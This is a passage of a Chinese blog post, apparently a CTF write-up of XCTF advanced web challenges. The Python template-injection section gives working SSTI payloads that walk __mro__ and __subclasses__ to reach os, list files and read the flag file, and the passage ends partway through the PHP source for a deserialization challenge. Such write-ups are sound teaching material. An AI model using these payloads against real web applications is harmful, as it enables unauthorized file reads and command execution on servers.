攻防世界web解题[进阶]（五）_[第三章 web进阶]ssti 1-CSDN博客

本文链接：https://blog.csdn.net/weixin_46703850/article/details/114499316

攻防世界web解题[进阶]（五）介绍:记录解题过程15.Web_python_template_injection(python 模板注入)16.Web_php_unserialize( php 反序列)17.easytornado18.shrine(flask模板注入)

摘要由CSDN通过智能技术生成

攻防世界web解题[进阶]（五）

15.Web_python_template_injection(python 模板注入)
16.Web_php_unserialize( php 反序列)
17.easytornado
18.shrine(flask模板注入)

介绍:记录解题过程

15.Web_python_template_injection(python 模板注入)

题目描述：暂无

参考:
《从0到1：CTFer成长之路》书籍配套题目-[第三章 web进阶]Python的安全问题
首页：

python template injection
python 模板注入(ssti模板注入)

<1>. 尝试：

http://111.200.241.244:44969/{
   {
   7*7}}

在这里插入图片描述

<2>. 得到可用的类的列表:

{
   {
   ''.__class__.__mro__[2].__subclasses__()}}

回显:

<3>. 我们需要的是os命令执行类<class ‘os._wrap_close’>,我们要判断他所属的位置，这样才能进行索引，os命令执行再列出文件：

payload

{
   {
   ''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].listdir('.')}}

回显:

URL http://111.200.241.244:44969/['fl4g', 'index.py'] not found

<4>.读取文件flag内容：

payload:

{
   {
   ''.__class__.__mro__[2].__subclasses__()[40]('fl4g').read()}}

flag:

URL http://111.200.241.244:44969/ctf{
   f22b6844-5169-4054-b2a0-d95b9361cb57} not found

16.Web_php_unserialize( php 反序列)

题目描述：暂无

首页：

<?php 
class Demo {
    
    private $file = 'index.php';
    public function __construct($file) {
    
        $this->file = $file; 
    }
    function __destruct() {
    
        echo @highlight_file($this->file, true); 
    }
    function __wakeup() {
    
        if ($this->file !=